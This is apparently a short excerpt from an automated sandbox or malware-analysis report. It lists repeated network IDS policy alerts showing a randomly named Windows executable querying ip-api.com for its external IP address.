  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: Potential Corporate Privacy Violation; AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: Device Retrieving External IP Address Detected; ET POLICY External IP Lookup ip-api.com
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: Potential Corporate Privacy Violation; AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
  • 2208 UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe: Device Retrieving External IP Address Detected; ET POLICY External IP Lookup ip-api.com
No debug info